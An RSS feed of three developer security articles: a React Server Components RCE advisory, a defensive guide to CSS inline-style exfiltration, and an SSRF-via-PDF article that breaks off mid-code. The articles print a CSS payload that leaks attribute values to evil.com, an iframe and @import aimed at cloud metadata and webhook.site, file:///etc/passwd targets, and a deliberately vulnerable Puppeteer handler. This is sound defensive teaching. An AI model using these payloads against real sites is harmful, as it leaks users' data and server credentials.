DEV Community: Vladimir Kukresh The latest articles on DEV Community by Vladimir Kukresh (@kreshby). https://dev.to/kreshby https://media2.dev.to/dynamic/image/width=90,height=90,fit=cover,gravity=auto,format=auto/https:%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Fuser%2Fprofile_image%2F392955%2Fc73b659e-f820-456c-8c59-95a1fdf5c630.jpg DEV Community: Vladimir Kukresh https://dev.to/kreshby en ⚠️ Critical RCE Vulnerability in React Server Components (CVSS 10.0) Vladimir Kukresh Fri, 12 Dec 2025 09:51:38 +0000 https://dev.to/kreshby/critical-rce-vulnerability-in-react-server-components-cvss-100-2pak https://dev.to/kreshby/critical-rce-vulnerability-in-react-server-components-cvss-100-2pak <blockquote> <p>A critical remote-code-execution (RCE) vulnerability has been disclosed in React Server Components (RSC), affecting multiple React versions and all frameworks that rely on RSC — including Next.js App Router.<br> Because the flaw enables unauthenticated arbitrary code execution on the server, the severity is rated CVSS 10.0 (maximum).</p> </blockquote> <p>This post summarizes what is affected, the actual risk, and the steps<br> required to secure your applications.</p> <p><a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F2r7o8ievwv5bv7rsnufz.png" class="article-body-image-wrapper"><img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F2r7o8ievwv5bv7rsnufz.png" alt="Critical RCE Vulnerability in React Server Components (CVSS 10.0)" width="800" height="336"></a></p> <h2> 🚨 Why this vulnerability matters </h2> <p>React Server Components introduce a hybrid rendering model where the<br> server returns component trees to the client.<br> The disclosed vulnerability allows malicious actors to abuse this<br> protocol and inject payloads that get executed server-side, leading to:</p> <ul> <li> Full server compromise</li> <li> Access to environment variables</li> <li> Supply-chain risk via poisoned responses</li> <li> Lateral movement inside the infrastructure</li> </ul> <p><strong>This is one of the most severe RSC-related issues ever published.</strong></p> <h2> ⚠️ Affected technologies </h2> <h3> React Server Components packages </h3> <p>Status Versions<br> <em>Vulnerable</em> 19.0, 19.1.0, 19.1.1, 19.2.0<br> <strong>Patched</strong> <strong>19.0.1, 19.1.2, 19.2.1+</strong></p> <h3> Next.js with App Router </h3> <p>Next.js uses RSC under the hood, making it affected by default when<br> using the <code>/app</code> directory.</p> <h4> Vulnerable versions </h4> <p>Next.js version<br> 15.x<br> 16.x (various releases)</p> <h4> Patched versions </h4> <p>Secure version<br> <strong>15.0.5</strong><br> <strong>15.1.9</strong><br> <strong>15.2.6</strong><br> <strong>15.3.6</strong><br> <strong>15.4.8</strong><br> <strong>15.5.7</strong><br> <strong>16.0.7</strong></p> <h2> 🔧 Required actions (immediate) </h2> <p><strong>Upgrade React RSC packages to one of the secure versions:</strong></p> <ul> <li> 19.0.1, 19.1.2, 19.2.1, or later.</li> <li> Upgrade Next.js to a patched version listed above.</li> <li> Rebuild and redeploy all affected applications after updating dependencies.</li> <li> Rotate secrets/credentials if your service was deployed with vulnerable versions.</li> </ul> <p><code>(Recommended) Review logs for suspicious RSC request patterns.</code></p> <h2> 🔍 How to check if your project is affected </h2> <h3> For React projects </h3> <p>Run:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight shell"><code>npm <span class="nb">ls </span>react-server react-server-dom-webpack </code></pre> </div> <p>Or inspect <code>package.json</code> / <code>pnpm-lock.yaml</code> for versions listed above.</p> <h3> For Next.js </h3> <p>Run:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight shell"><code>npx next info </code></pre> </div> <p>Check whether:</p> <ul> <li> You're using the App Router (/app directory)</li> <li> Your Next.js version is in the vulnerable range</li> </ul> <h2> 📌 Applicability </h2> <p><strong>This advisory applies to:</strong></p> <ul> <li> Projects built on React that use RSC</li> <li> Projects built on Next.js App Router</li> <li> Any backend that processes RSC protocol traffic</li> </ul> <p>It does <strong>not</strong> impact traditional React applications that do not use<br> RSC.</p> <h2> 🔥 Final notes </h2> <p>This vulnerability is a rare case where React's server-side<br> infrastructure becomes an attack vector with zero-authentication, remote<br> exploitability, and full server compromise potential.<br> If your team maintains applications using RSC or Next.js App Router,<br> <strong>Treat these updates as urgent.</strong></p> <p><strong>Stay safe and patch early.</strong></p> <blockquote> <p>React Team “Critical Security Vulnerability in React Server Components (CVE-2025-55182)”<br> <a href="https://react.dev/blog/2025/12/03/critical-security-vulnerability-in-react-server-components" rel="noopener noreferrer">https://react.dev/blog/2025/12/03/critical-security-vulnerability-in-react-server-components</a></p> </blockquote> webdev vulnerabilities react nextjs How React/Next.js Developers Can Defend Against Inline Style Exfiltration (ISE) Vladimir Kukresh Mon, 08 Sep 2025 18:11:23 +0000 https://dev.to/kreshby/how-reactnextjs-developers-can-defend-against-inline-style-exfiltration-ise-1hlo https://dev.to/kreshby/how-reactnextjs-developers-can-defend-against-inline-style-exfiltration-ise-1hlo <h2> How React/Next.js Developers Can Defend Against Inline Style Exfiltration (ISE) </h2> <p>In August 2025, <a href="https://portswigger.net/research/inline-style-exfiltration" rel="noopener noreferrer">Gareth Heyes (PortSwigger)</a> demonstrated a new attack vector called <strong>Inline Style Exfiltration (ISE)</strong>. Using nothing but <strong>inline styles</strong>, an attacker can exfiltrate attribute values from the DOM — no external stylesheets, no selectors.</p> <p>⚠️ <strong>At the time of writing, this technique worked in Chromium-based browsers.</strong></p> <h2> How the attack works </h2> <p>The breakthrough came with the CSS <code>if()</code> function. It lets developers (and attackers) write conditional expressions inside CSS.<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight html"><code><span class="nt">&lt;div</span> <span class="na">style=</span><span class="s">' --val: attr(data-username); --steal: if(style(--val:"alice"): url(https://evil.com/alice); else: url(https://evil.com/bob)); background: image-set(var(--steal)); '</span> <span class="na">data-username=</span><span class="s">"bob"</span><span class="nt">&gt;</span>Test<span class="nt">&lt;/div&gt;</span> </code></pre> </div> <ul> <li> <code>attr(data-username)</code> extracts the attribute.</li> <li> <code>if(style(--val:"alice") …)</code> checks if the value matches.</li> <li> <code>image-set()</code> triggers a request to the attacker’s server when the match is found.</li> </ul> <p>By chaining multiple <code>if()</code> conditions, an attacker can brute-force attribute values like <code>data-uid</code> or <code>data-username</code>.</p> <h2> Why React/Next.js apps are at risk </h2> <p>React makes it tempting to pass props straight into <code>style</code> or <code>data-*</code> attributes. Combined with ISE, this can leak user IDs, usernames, or even tokens if they are accidentally exposed in DOM attributes.</p> <h2> Mitigation strategies </h2> <h3> 1. Never map raw user input to <code>style</code> </h3> <p>❌ Bad:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight tsx"><code><span class="p">&lt;</span><span class="nt">div</span> <span class="na">style</span><span class="p">=</span><span class="si">{</span><span class="p">{</span> <span class="na">backgroundImage</span><span class="p">:</span> <span class="nx">userInput</span> <span class="p">}</span><span class="si">}</span> <span class="p">/&gt;</span> </code></pre> </div> <p>✅ Good:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight tsx"><code><span class="kd">const</span> <span class="nx">bgToken</span> <span class="o">=</span> <span class="nx">ALLOWED_BG</span><span class="p">[</span><span class="nx">userChoice</span><span class="p">]</span> <span class="o">??</span> <span class="dl">'</span><span class="s1">bg-default</span><span class="dl">'</span><span class="p">;</span> <span class="k">return</span> <span class="p">&lt;</span><span class="nt">div</span> <span class="na">className</span><span class="p">=</span><span class="si">{</span><span class="nx">bgToken</span><span class="si">}</span> <span class="p">/&gt;;</span> </code></pre> </div> <p>Allow only whitelisted units (<code>px</code>, <code>rem</code>, <code>%</code>) and color formats (<code>#RRGGBB</code>). Strip out functions like <code>url()</code>, <code>if()</code>, <code>attr()</code>, <code>image-set()</code>, <code>style()</code>.</p> <h3> 2. Don’t store secrets in <code>data-*</code> </h3> <p>Never put IDs, emails, tokens, or roles in <code>data-*</code>. Keep them in React state, context, or HttpOnly cookies.</p> <h3> 3. Use CSP to block inline styles </h3> <p>Add a strict Content-Security-Policy. Critical piece: disallow <code>style=""</code> attributes.</p> <p>Content-Security-Policy:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight http"><code><span class="err"> default-src 'self'; style-src 'self'; style-src-attr 'none'; style-src-elem 'self' 'nonce-&lt;nonce&gt;'; img-src 'self' https://cdn.example.com; connect-src 'self'; base-uri 'none'; frame-ancestors 'none'; </span></code></pre> </div> <ul> <li> <code>style-src-attr 'none'</code> blocks inline style attributes.</li> <li>Ideally, you’d use <code>style-src-elem 'nonce-...'</code> with nonces for <code>&lt;style&gt;</code> tags.</li> <li>In Next.js this is tricky because the framework injects its own styles.</li> </ul> <p>Practical alternatives:</p> <ul> <li>Start with <code>style-src-elem 'self'</code>.</li> <li>Or use hashes (<code>sha256-...</code>) for critical inline styles that Next.js generates.</li> </ul> <p>👉 <a href="https://nextjs.org/docs/pages/guides/content-security-policy" rel="noopener noreferrer">See official Next.js docs on CSP</a></p> <h4> In Next.js </h4> <div class="highlight js-code-highlight"> <pre class="highlight javascript"><code><span class="c1">// next.config.js</span> <span class="kd">const</span> <span class="nx">securityHeaders</span> <span class="o">=</span> <span class="p">[</span> <span class="p">{</span> <span class="na">key</span><span class="p">:</span> <span class="dl">'</span><span class="s1">Content-Security-Policy</span><span class="dl">'</span><span class="p">,</span> <span class="na">value</span><span class="p">:</span> <span class="s2">` default-src 'self'; style-src 'self'; style-src-attr 'none'; style-src-elem 'self' 'nonce-__INLINE_STYLE_NONCE__'; img-src 'self' https://cdn.example.com; connect-src 'self'; base-uri 'none'; frame-ancestors 'none'; `</span><span class="p">.</span><span class="nf">replace</span><span class="p">(</span><span class="sr">/</span><span class="se">\s{2,}</span><span class="sr">/g</span><span class="p">,</span> <span class="dl">'</span><span class="s1"> </span><span class="dl">'</span><span class="p">)</span> <span class="p">}</span> <span class="p">];</span> <span class="nx">module</span><span class="p">.</span><span class="nx">exports</span> <span class="o">=</span> <span class="p">{</span> <span class="k">async</span> <span class="nf">headers</span><span class="p">()</span> <span class="p">{</span> <span class="k">return</span> <span class="p">[{</span> <span class="na">source</span><span class="p">:</span> <span class="dl">'</span><span class="s1">/(.*)</span><span class="dl">'</span><span class="p">,</span> <span class="na">headers</span><span class="p">:</span> <span class="nx">securityHeaders</span> <span class="p">}];</span> <span class="p">}</span> <span class="p">};</span> </code></pre> </div> <h3> 4. Sanitise user-generated HTML </h3> <p>If you allow Markdown or WYSIWYG editors:</p> <ul> <li>Use DOMPurify/rehype-sanitize on the server.</li> <li>Forbid <code>style</code> attributes (<code>FORBID_ATTR: ['style']</code>).</li> <li>If <code>style</code> must be allowed, enforce a strict allowlist (e.g. <code>color</code>, <code>font-size</code> only).</li> </ul> <h3> 5. Linting &amp; CI </h3> <ul> <li>ESLint rule: forbid <code>dangerouslySetInnerHTML</code> and raw strings in <code>style</code>.</li> <li>Grep/regex in CI for suspicious CSS functions (<code>url(</code>, <code>if(</code>, <code>attr(</code>, <code>image-set(</code>).</li> <li>Ensure no sensitive <code>data-*</code> attributes in JSX.</li> </ul> <h3> 6. Component design </h3> <p>Expose enums or theme tokens as props, never raw CSS.</p> <p>❌ Instead of:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight tsx"><code><span class="p">&lt;</span><span class="nc">Button</span> <span class="na">color</span><span class="p">=</span><span class="si">{</span><span class="nx">userInput</span><span class="si">}</span> <span class="p">/&gt;</span> </code></pre> </div> <p>✅ Do:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight tsx"><code><span class="p">&lt;</span><span class="nc">Button</span> <span class="na">variant</span><span class="p">=</span><span class="si">{</span><span class="nx">userChoice</span> <span class="o">===</span> <span class="dl">"</span><span class="s2">danger</span><span class="dl">"</span> <span class="p">?</span> <span class="dl">"</span><span class="s2">danger</span><span class="dl">"</span> <span class="p">:</span> <span class="dl">"</span><span class="s2">primary</span><span class="dl">"</span><span class="si">}</span> <span class="p">/&gt;</span> </code></pre> </div> <h3> 7. Monitoring </h3> <p>ISE often brute-forces attributes by making dozens of tiny requests (<code>/1</code>, <code>/2</code>, <code>/3</code>).</p> <ul> <li>Use CSP <code>report-to</code> / <code>report-uri</code> to catch violations.</li> <li>Alert on suspicious requests in your CDN or logs.</li> </ul> <h2> Review checklist </h2> <ul> <li>No <code>unsafe-inline</code> in CSP.</li> <li> <code>style-src-attr 'none'</code> enabled.</li> <li> <code>style-src-elem</code> restricted (<code>self</code>, nonces, or hashes).</li> <li> <code>img-src</code> and <code>connect-src</code> restricted to trusted domains. This prevents not only ISE leaks but also classic data exfiltration via <code>&lt;img src&gt;</code> or fetch.</li> <li>No raw input mapped into <code>style</code> or CSS variables.</li> <li>Sensitive data not in <code>data-*</code>.</li> <li>Sanitisers strip or restrict <code>style</code>.</li> <li>Lint rules enforce safe patterns.</li> <li>UGC rendered in sandbox/isolated domains.</li> </ul> <h2> Diagram: How <code>data-uid</code> leaks via ISE </h2> <div class="highlight js-code-highlight"> <pre class="highlight plaintext"><code>Victim's browser: &lt;div data-uid="5"&gt; Inline CSS conditionals: if(data-uid="1") → /1 ... if(data-uid="5") → /5 Attacker's server: Logs request /5 </code></pre> </div> <p>For clarity, the diagram is simplified. Real ISE uses inline style conditionals (<code>if()</code>, <code>style()</code>).</p> <h2> Conclusion </h2> <p>CSS is no longer “just declarative.” With <code>if()</code>, it now supports conditional logic — and new risks.</p> <p>For Next.js apps, the recipe is simple:</p> <ul> <li>no inline styles from data</li> <li>strict CSP with <code>style-src-attr 'none'</code> </li> <li>sanitise aggressively</li> <li>design components around tokens, not raw CSS</li> </ul> <h2> References </h2> <ul> <li>Gareth Heyes — <a href="https://portswigger.net/research/inline-style-exfiltration" rel="noopener noreferrer">Inline Style Exfiltration: leaking data with chained CSS conditionals</a> (PortSwigger, 2025)</li> <li><a href="https://developer.mozilla.org/en-US/docs/Web/CSS/if" rel="noopener noreferrer">MDN: CSS <code>if()</code></a></li> <li><a href="https://www.w3.org/TR/CSP3/" rel="noopener noreferrer">Content Security Policy Level 3 (W3C)</a></li> <li><a href="https://nextjs.org/docs/pages/guides/content-security-policy" rel="noopener noreferrer">Next.js docs: Content Security Policy</a></li> </ul> react nextjs css security SSRF via PDF: A Silent Threat for React/Next.js Developers Vladimir Kukresh Mon, 11 Aug 2025 12:52:48 +0000 https://dev.to/kreshby/ssrf-via-pdf-a-silent-threat-for-reacttypescript-developers-5h0f https://dev.to/kreshby/ssrf-via-pdf-a-silent-threat-for-reacttypescript-developers-5h0f <h2> 🛡 SSRF via PDF: A Silent Threat for React/Next.js Developers </h2> <p><em>Have you tested your PDF exports for SSRF vulnerabilities?</em></p> <h2> 📖 Introduction </h2> <p>Many React + Next.js developers assume that if everything happens in the browser, they’re safe.<br><br> But once your project includes <strong>PDF export</strong> (invoices, reports, analytics), a <strong>headless browser</strong> comes into play on the server side.</p> <p><strong>Key question:</strong> What happens if that browser can make requests <em>on behalf of your server</em>?</p> <h2> <img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Funmymx6j5yrrn3mlpyqn.png" alt="SSRF via PDF: A Silent Threat for React/TypeScript Developers" width="800" height="1200"> </h2> <h2> 📈 Fresh Stats &amp; Sources </h2> <ul> <li> <strong>Actively Exploiting Multiple SSRF Vulnerabilities</strong>. <a href="https://cybersecuritynews.com/400-ips-actively-exploiting-multiple-ssrf-vulnerabilities" rel="noopener noreferrer">400+ IPs Actively Exploiting Multiple SSRF Vulnerabilities In The Wild</a> </li> <li> <strong>OWASP Top 10 (A10:2021)</strong>: SSRF is “low prevalence but high impact.” <a href="https://owasp.org/Top10/A10_2021-Server-Side_Request_Forgery_(SSRF)/" rel="noopener noreferrer">OWASP A10:2021 — Server-Side Request Forgery (SSRF)</a> </li> </ul> <h2> 🧪 Live PoC with webhook.site </h2> <ul> <li>Open <strong><a href="https://webhook.site" rel="noopener noreferrer">https://webhook.site</a></strong> and copy your unique URL.</li> <li>Send this HTML to your PDF rendering endpoint: </li> </ul> <div class="highlight js-code-highlight"> <pre class="highlight html"><code><span class="nt">&lt;iframe</span> <span class="na">src=</span><span class="s">"https://webhook.site/YOUR-UUID"</span><span class="nt">&gt;&lt;/iframe&gt;</span> </code></pre> </div> <ul> <li>On <a href="https://webhook.site" rel="noopener noreferrer">https://webhook.site</a>, you'll see a request from HeadlessChrome proof that SSRF is happening.</li> </ul> <p>❌ <strong>What NOT to Do (Vulnerable Example)</strong><br> </p> <div class="highlight js-code-highlight"> <pre class="highlight typescript"><code><span class="c1">// pages/api/generate-pdf.ts</span> <span class="k">import</span> <span class="nx">puppeteer</span> <span class="k">from</span> <span class="dl">'</span><span class="s1">puppeteer</span><span class="dl">'</span> <span class="k">export</span> <span class="k">default</span> <span class="k">async</span> <span class="kd">function</span> <span class="nf">handler</span><span class="p">(</span><span class="nx">req</span><span class="p">,</span> <span class="nx">res</span><span class="p">)</span> <span class="p">{</span> <span class="kd">const</span> <span class="p">{</span> <span class="nx">htmlContent</span> <span class="p">}</span> <span class="o">=</span> <span class="nx">req</span><span class="p">.</span><span class="nx">body</span> <span class="kd">const</span> <span class="nx">browser</span> <span class="o">=</span> <span class="k">await</span> <span class="nx">puppeteer</span><span class="p">.</span><span class="nf">launch</span><span class="p">()</span> <span class="kd">const</span> <span class="nx">page</span> <span class="o">=</span> <span class="k">await</span> <span class="nx">browser</span><span class="p">.</span><span class="nf">newPage</span><span class="p">()</span> <span class="k">await</span> <span class="nx">page</span><span class="p">.</span><span class="nf">setContent</span><span class="p">(</span><span class="nx">htmlContent</span><span class="p">,</span> <span class="p">{</span> <span class="na">waitUntil</span><span class="p">:</span> <span class="dl">'</span><span class="s1">networkidle0</span><span class="dl">'</span> <span class="p">})</span> <span class="c1">// ⚠️ No sanitization</span> <span class="kd">const</span> <span class="nx">pdf</span> <span class="o">=</span> <span class="k">await</span> <span class="nx">page</span><span class="p">.</span><span class="nf">pdf</span><span class="p">()</span> <span class="k">await</span> <span class="nx">browser</span><span class="p">.</span><span class="nf">close</span><span class="p">()</span> <span class="nx">res</span><span class="p">.</span><span class="nf">setHeader</span><span class="p">(</span><span class="dl">'</span><span class="s1">Content-Type</span><span class="dl">'</span><span class="p">,</span> <span class="dl">'</span><span class="s1">application/pdf</span><span class="dl">'</span><span class="p">)</span> <span class="nx">res</span><span class="p">.</span><span class="nf">send</span><span class="p">(</span><span class="nx">pdf</span><span class="p">)</span> <span class="p">}</span> </code></pre> </div> <p>Issues:</p> <ul> <li>Injected HTML is not sanitized.</li> <li>No request blocking.</li> <li>Dangerous vectors include <code>&lt;iframe&gt;</code> and CSS imports: </li> </ul> <div class="highlight js-code-highlight"> <pre class="highlight css"><code><span class="k">@import</span> <span class="sx">url("http://169.254.169.254/latest/meta-data/")</span><span class="p">;</span> </code></pre> </div> <p>✅ <strong>How to Do It Right (Next.js + TS)</strong><br> </p> <div class="highlight js-code-highlight"> <pre class="highlight typescript"><code> <span class="k">import</span> <span class="nx">puppeteer</span> <span class="k">from</span> <span class="dl">'</span><span class="s1">puppeteer</span><span class="dl">'</span> <span class="k">import</span> <span class="nx">DOMPurify</span> <span class="k">from</span> <span class="dl">'</span><span class="s1">isomorphic-dompurify</span><span class="dl">'</span> <span class="k">import</span> <span class="kd">type</span> <span class="p">{</span> <span class="nx">NextApiRequest</span><span class="p">,</span> <span class="nx">NextApiResponse</span> <span class="p">}</span> <span class="k">from</span> <span class="dl">'</span><span class="s1">next</span><span class="dl">'</span> <span class="k">export</span> <span class="k">default</span> <span class="k">async</span> <span class="kd">function</span> <span class="nf">handler</span><span class="p">(</span><span class="nx">req</span><span class="p">:</span> <span class="nx">NextApiRequest</span><span class="p">,</span> <span class="nx">res</span><span class="p">:</span> <span class="nx">NextApiResponse</span><span class="p">)</span> <span class="p">{</span> <span class="kd">const</span> <span class="p">{</span> <span class="nx">htmlContent</span> <span class="p">}</span> <span class="o">=</span> <span class="nx">req</span><span class="p">.</span><span class="nx">body</span> <span class="k">as</span> <span class="p">{</span> <span class="na">htmlContent</span><span class="p">:</span> <span class="kr">string</span> <span class="p">}</span> <span class="c1">// 1. SANITIZE HTML</span> <span class="kd">const</span> <span class="nx">cleanHtml</span> <span class="o">=</span> <span class="nx">DOMPurify</span><span class="p">.</span><span class="nf">sanitize</span><span class="p">(</span><span class="nx">htmlContent</span><span class="p">,</span> <span class="p">{</span> <span class="na">ALLOWED_TAGS</span><span class="p">:</span> <span class="p">[</span><span class="dl">'</span><span class="s1">b</span><span class="dl">'</span><span class="p">,</span> <span class="dl">'</span><span class="s1">i</span><span class="dl">'</span><span class="p">,</span> <span class="dl">'</span><span class="s1">p</span><span class="dl">'</span><span class="p">,</span> <span class="dl">'</span><span class="s1">strong</span><span class="dl">'</span><span class="p">,</span> <span class="dl">'</span><span class="s1">em</span><span class="dl">'</span><span class="p">,</span> <span class="dl">'</span><span class="s1">u</span><span class="dl">'</span><span class="p">,</span> <span class="dl">'</span><span class="s1">br</span><span class="dl">'</span><span class="p">],</span> <span class="na">ALLOWED_ATTR</span><span class="p">:</span> <span class="p">[]</span> <span class="p">})</span> <span class="kd">const</span> <span class="nx">browser</span> <span class="o">=</span> <span class="k">await</span> <span class="nx">puppeteer</span><span class="p">.</span><span class="nf">launch</span><span class="p">()</span> <span class="kd">const</span> <span class="nx">page</span> <span class="o">=</span> <span class="k">await</span> <span class="nx">browser</span><span class="p">.</span><span class="nf">newPage</span><span class="p">()</span> <span class="c1">// 2. BLOCK UNWANTED REQUESTS (FE-critical!)</span> <span class="nx">page</span><span class="p">.</span><span class="nf">on</span><span class="p">(</span><span class="dl">'</span><span class="s1">request</span><span class="dl">'</span><span class="p">,</span> <span class="p">(</span><span class="nx">request</span><span class="p">)</span> <span class="o">=&gt;</span> <span class="p">{</span> <span class="k">if </span><span class="p">(</span><span class="nf">isCloudMetadata</span><span class="p">(</span><span class="nx">request</span><span class="p">.</span><span class="nf">url</span><span class="p">()))</span> <span class="nx">request</span><span class="p">.</span><span class="nf">abort</span><span class="p">()</span> <span class="c1">// 🛑</span> <span class="k">else</span> <span class="nx">request</span><span class="p">.</span><span class="k">continue</span><span class="p">()</span> <span class="p">})</span> <span class="k">await</span> <span class="nx">page</span><span class="p">.</span><span class="nf">setRequestInterception</span><span class="p">(</span><span class="kc">true</span><span class="p">)</span> <span class="kd">const</span> <span class="nx">isCloudMetadata</span> <span class="o">=</span> <span class="p">(</span><span class="nx">url</span><span class="p">:</span> <span class="kr">string</span><span class="p">)</span> <span class="o">=&gt;</span> <span class="nx">url</span><span class="p">.</span><span class="nf">includes</span><span class="p">(</span><span class="dl">'</span><span class="s1">169.254.169.254</span><span class="dl">'</span><span class="p">)</span> <span class="o">||</span> <span class="nx">url</span><span class="p">.</span><span class="nf">includes</span><span class="p">(</span><span class="dl">'</span><span class="s1">localhost</span><span class="dl">'</span><span class="p">)</span> <span class="o">||</span> <span class="nx">url</span><span class="p">.</span><span class="nf">startsWith</span><span class="p">(</span><span class="dl">'</span><span class="s1">file://</span><span class="dl">'</span><span class="p">)</span> <span class="c1">// 3. CSP</span> <span class="k">await</span> <span class="nx">page</span><span class="p">.</span><span class="nf">setExtraHTTPHeaders</span><span class="p">({</span> <span class="dl">'</span><span class="s1">Content-Security-Policy</span><span class="dl">'</span><span class="p">:</span> <span class="dl">"</span><span class="s2">default-src 'none'; img-src 'self'; style-src 'self'; font-src 'self';</span><span class="dl">"</span> <span class="p">})</span> <span class="k">await</span> <span class="nx">page</span><span class="p">.</span><span class="nf">setContent</span><span class="p">(</span><span class="nx">cleanHtml</span><span class="p">,</span> <span class="p">{</span> <span class="na">waitUntil</span><span class="p">:</span> <span class="dl">'</span><span class="s1">networkidle0</span><span class="dl">'</span> <span class="p">})</span> <span class="kd">const</span> <span class="nx">pdf</span> <span class="o">=</span> <span class="k">await</span> <span class="nx">page</span><span class="p">.</span><span class="nf">pdf</span><span class="p">()</span> <span class="k">await</span> <span class="nx">browser</span><span class="p">.</span><span class="nf">close</span><span class="p">()</span> <span class="nx">res</span><span class="p">.</span><span class="nf">setHeader</span><span class="p">(</span><span class="dl">'</span><span class="s1">Content-Type</span><span class="dl">'</span><span class="p">,</span> <span class="dl">'</span><span class="s1">application/pdf</span><span class="dl">'</span><span class="p">)</span> <span class="nx">res</span><span class="p">.</span><span class="nf">send</span><span class="p">(</span><span class="nx">pdf</span><span class="p">)</span> <span class="p">}</span> </code></pre> </div> <p>🔄 <strong>No-Browser Alternative</strong><br> </p> <div class="highlight js-code-highlight"> <pre class="highlight typescript"><code><span class="k">import</span> <span class="p">{</span> <span class="nx">PDFDocument</span> <span class="p">}</span> <span class="k">from</span> <span class="dl">'</span><span class="s1">pdf-lib</span><span class="dl">'</span> <span class="k">import</span> <span class="kd">type</span> <span class="p">{</span> <span class="nx">NextApiRequest</span><span class="p">,</span> <span class="nx">NextApiResponse</span> <span class="p">}</span> <span class="k">from</span> <span class="dl">'</span><span class="s1">next</span><span class="dl">'</span> <span class="k">export</span> <span class="k">default</span> <span class="k">async</span> <span class="kd">function</span> <span class="nf">handler</span><span class="p">(</span><span class="nx">req</span><span class="p">:</span> <span class="nx">NextApiRequest</span><span class="p">,</span> <span class="nx">res</span><span class="p">:</span> <span class="nx">NextApiResponse</span><span class="p">)</span> <span class="p">{</span> <span class="kd">const</span> <span class="nx">pdfDoc</span> <span class="o">=</span> <span class="k">await</span> <span class="nx">PDFDocument</span><span class="p">.</span><span class="nf">create</span><span class="p">()</span> <span class="kd">const</span> <span class="nx">page</span> <span class="o">=</span> <span class="nx">pdfDoc</span><span class="p">.</span><span class="nf">addPage</span><span class="p">([</span><span class="mi">595</span><span class="p">,</span> <span class="mi">842</span><span class="p">])</span> <span class="c1">// A4</span> <span class="nx">page</span><span class="p">.</span><span class="nf">drawText</span><span class="p">(</span><span class="dl">'</span><span class="s1">Hello, secure PDF!</span><span class="dl">'</span><span class="p">,</span> <span class="p">{</span> <span class="na">x</span><span class="p">:</span> <span class="mi">50</span><span class="p">,</span> <span class="na">y</span><span class="p">:</span> <span class="mi">790</span><span class="p">,</span> <span class="na">size</span><span class="p">:</span> <span class="mi">16</span> <span class="p">})</span> <span class="kd">const</span> <span class="nx">pdfBytes</span> <span class="o">=</span> <span class="k">await</span> <span class="nx">pdfDoc</span><span class="p">.</span><span class="nf">save</span><span class="p">()</span> <span class="nx">res</span><span class="p">.</span><span class="nf">setHeader</span><span class="p">(</span><span class="dl">'</span><span class="s1">Content-Type</span><span class="dl">'</span><span class="p">,</span> <span class="dl">'</span><span class="s1">application/pdf</span><span class="dl">'</span><span class="p">)</span> <span class="nx">res</span><span class="p">.</span><span class="nf">send</span><span class="p">(</span><span class="nx">Buffer</span><span class="p">.</span><span class="k">from</span><span class="p">(</span><span class="nx">pdfBytes</span><span class="p">))</span> <span class="p">}</span> </code></pre> </div> <blockquote> <p>Benefit: No headless browser → no network requests.</p> </blockquote> <p>🖼 <strong>Attack Diagram</strong><br> </p> <div class="highlight js-code-highlight"> <pre class="highlight shell"><code> <span class="o">[</span> User 👨‍💻 <span class="o">]</span> | | POST htmlContent with &lt;iframe <span class="nv">src</span><span class="o">=</span><span class="s2">"http://169.254.169.254/"</span><span class="o">&gt;</span> v <span class="o">[</span> Next.js API ⚡ <span class="o">]</span> | | Render HTML via Puppeteer v <span class="o">[</span> Headless Chrome 🌐 <span class="o">]</span> | | HTTP/file request to internal resources: | - http://169.254.169.254/latest/meta-data/ | - http://localhost:8080/admin | - file:///etc/passwd v <span class="o">[</span> AWS ☁️ / Internal Data <span class="o">]</span> | | Response embedded <span class="k">in </span>PDF v <span class="o">[</span> User downloads PDF 📄 <span class="o">]</span> </code></pre> </div> <h2> 📌 Key SSRF Breaches &amp; Reports </h2> <h3> 🏦 <strong>Capital One (2019)</strong> </h3> <ul> <li> <strong>Attack Vector</strong>: SSRF → AWS IMDSv1 exploitation </li> <li> <strong>Impact</strong>: 106 million records compromised </li> <li> <strong>References</strong>: <ul> <li> <a href="https://dl.acm.org/doi/10.1145/3546068" rel="noopener noreferrer">ACM Analysis</a> </li> <li> <a href="https://www.capitalone.com/digital/facts2019/" rel="noopener noreferrer">Official Statement</a> </li> </ul> </li> </ul> <h3> 📄 <strong>Pentest Case (2024)</strong> </h3> <ul> <li> <strong>Scenario</strong>: PDF export functionality → Internal API access </li> <li> <strong>Technical Breakdown</strong>: <a href="https://blog.cyberadvisors.com/technical-blog/pdf-server-side-request-forgery-cyber-advisors-technical-blog" rel="noopener noreferrer">CyberAdvisors Blog Post</a> </li> </ul> <h3> 💰 <strong>HackerOne Report #2262382</strong> </h3> <ul> <li> <strong>Severity</strong>: Critical SSRF (AWS metadata exposure) </li> <li> <strong>Bounty</strong>: $10,000 </li> <li> <strong>Report</strong>: <a href="https://hackerone.com/reports/2262382" rel="noopener noreferrer">HackerOne Disclosure</a> </li> </ul> <h2> 🛡️ SSRF Prevention Matrix </h2> <div class="table-wrapper-paragraph"><table> <thead> <tr> <th>Tactic</th> <th>Implementation</th> <th>Effort</th> </tr> </thead> <tbody> <tr> <td><strong>Request Blocking</strong></td> <td><code>page.setRequestInterception</code></td> <td>Low</td> </tr> <tr> <td><strong>HTML Sanitization</strong></td> <td><code>DOMPurify</code></td> <td>Medium</td> </tr> <tr> <td><strong>Browser Elimination</strong></td> <td><code>pdf-lib</code></td> <td>High</td> </tr> </tbody> </table></div> <h2> 📡 Monitoring with Sentry </h2> <div class="highlight js-code-highlight"> <pre class="highlight typescript"><code><span class="k">import</span> <span class="o">*</span> <span class="k">as</span> <span class="nx">Sentry</span> <span 